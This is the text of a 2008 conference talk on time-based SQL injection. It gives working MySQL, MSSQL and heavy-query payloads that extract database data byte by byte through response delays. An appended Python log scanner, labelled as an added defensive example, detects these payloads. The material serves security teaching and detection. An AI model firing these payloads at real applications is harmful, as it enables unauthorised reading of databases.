2008 Security-Assessment.com
Who am I
Agenda
- What is time based SQL Injection
- Differences between blind and time based SQL Injection
- Time based injection with heavy queries
- Limitation of time based SQL Injection
In Band Injection
OOB Injection
[Diagram: web server, Database A and Database B (10.1.1.1)]
- The application generates a custom error message for a failed response and the normal page for a successful response
- Comparison between true and false response: AND 1=1 -> true, AND 1=2 -> false
- Read data byte by byte
- Use a time delay to differentiate between true and false
- True response: the time delay is executed
- False response: the time delay is not executed
- Read data byte by byte, exactly the same method as blind injection
- When the application generates the default page for a true or false response
- When the application generates the same custom error page for a true or false response
- Injection is successful but can't be seen by the attacker
FALSE = 117ms
TRUE = 2478ms
Blind Injection (for MySQL)
1 AND ASCII(substring((@@version),1,1))<52
- If the first character of the database version is less than 4, it is true
- If the first character of the database version is 4 or more, it is false
(The slide annotates the payload's query, position, operator and char parts.)
Time Based Blind Injection (for MySQL)
1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))
- If the first character of the database version is less than 4, execute BENCHMARK
- If the first character of the database version is not less than 4, do not execute BENCHMARK
(The slide annotates the payload's char, query, count, time, operator, position and time delay parts.)
Time Based Injection (MSSQL)
1; IF NOT (ASCII(SUBSTRING((SELECT @@version),25,1)) < 52) WAITFOR DELAY '0:0:9'--
- If the character at position 25 of the version string is not less than 4 (ASCII 52), WAITFOR DELAY executes and the response is delayed by 9 seconds
Other Databases
- Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions
- Time Based Injection is possible by using heavy queries
- Chema Alonso and José Parada talked about this at Defcon 2008
- 2 types of conditions in the 'where clause': Light Condition first, Heavy Condition first
- Select A from B where ConditionA and ConditionB
[Table: evaluation order of ConditionA and ConditionB; only the Result column survived: True, True, True, False, False]
[Table: evaluation order of ConditionA and ConditionB; only the Result column survived: True, True, True, False, False]
Heavy Queries
Oracle - all_users
Heavy Queries
Example of time based injection using heavy queries on MSSQL (light condition evaluates first):
1 AND (select count(*) FROM sysusers as sys1, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8) > 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)
- Suitable for databases that do not support time delay functions, e.g. Oracle and MS Access
(The slide marks the first subquery as the heavy query and the second as the light query.)
Limitation
- Results are not reliable during busy times
- Time delay results also depend on how much data is stored in the table
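As a defender-side illustration of the payloads on these slides (an added example, not part of the talk): a Python scanner that flags requests whose decoded query string carries the talk's delay primitives (BENCHMARK, WAITFOR DELAY) or a heavy self-join on sysusers/all_users, and treats a byte-extraction fragment paired with a slow response as a time-based probe. The log format, the sample lines and the 1000 ms threshold are constructed assumptions.

```python
"""Flag time-based SQL injection probes in web access logs (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log: method, path, status, response time in ms.
# The last line is a benign request that mentions "benchmark" in plain text.
SAMPLE_LOG = """\
GET /item.php?id=1 200 117
GET /item.php?id=1+AND+ASCII(substring((@@version),1,1))<52 200 121
GET /item.php?id=1+AND+(SELECT+IF((IFNULL(ASCII(SUBSTRING((SELECT+@@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1)) 200 2478
GET /item.php?id=1;+IF+NOT+(ASCII(SUBSTRING((SELECT+@@version),25,1))<52)+WAITFOR+DELAY+'0:0:9'-- 200 9042
GET /item.php?id=1+AND+(select+count(*)+FROM+sysusers+as+sys1,+sysusers+as+sys2,+sysusers+as+sys3)>0+AND+52<(select+top+1+ASCII(substring(name,1,1))+from+sysusers) 200 3310
GET /search.php?q=benchmark+results 200 98
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\d+)$")
# Explicit delay primitives: MySQL BENCHMARK(...) and MSSQL WAITFOR DELAY.
DELAY_RE = re.compile(r"\bbenchmark\s*\(|\bwaitfor\s+delay\b", re.I)
# Heavy query: the same system table self-joined two or more times in one FROM list.
HEAVY_RE = re.compile(r"\bfrom\b(?:\s*(?:sysusers|all_users)\s+as\s+\w+\s*,?){2,}", re.I)
# Byte-by-byte extraction fragment shared by blind and time-based payloads.
EXTRACT_RE = re.compile(r"ascii\s*\(\s*substring\s*\(", re.I)
SLOW_MS = 1000  # assumed threshold; raise it on a busy server (see Limitation)


def classify(path, elapsed_ms):
    """Return indicator names for one request; an empty list means nothing suspicious."""
    decoded = unquote_plus(path)  # normalise %xx and '+' before matching
    hits = []
    if DELAY_RE.search(decoded):
        hits.append("delay-function")
    if HEAVY_RE.search(decoded):
        hits.append("heavy-query")
    # Extraction fragment alone is blind injection; with a slow response it
    # points at a time-based probe whose delay primitive the patterns missed.
    if EXTRACT_RE.search(decoded) and elapsed_ms >= SLOW_MS:
        hits.append("slow-extraction")
    return hits


def scan_log(text):
    """Return (path, elapsed_ms, indicators) for every flagged line in the log."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path, elapsed = m.group(2), int(m.group(4))
        hits = classify(path, elapsed)
        if hits:
            findings.append((path, elapsed, hits))
    return findings
```

The fast blind payload on the second sample line is deliberately not flagged: on its own it is indistinguishable from a normal request by timing, which is why the talk pairs the extraction fragment with a delay.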
Demo
Questions?
muhaimin.dzulfakar@security-assessment.com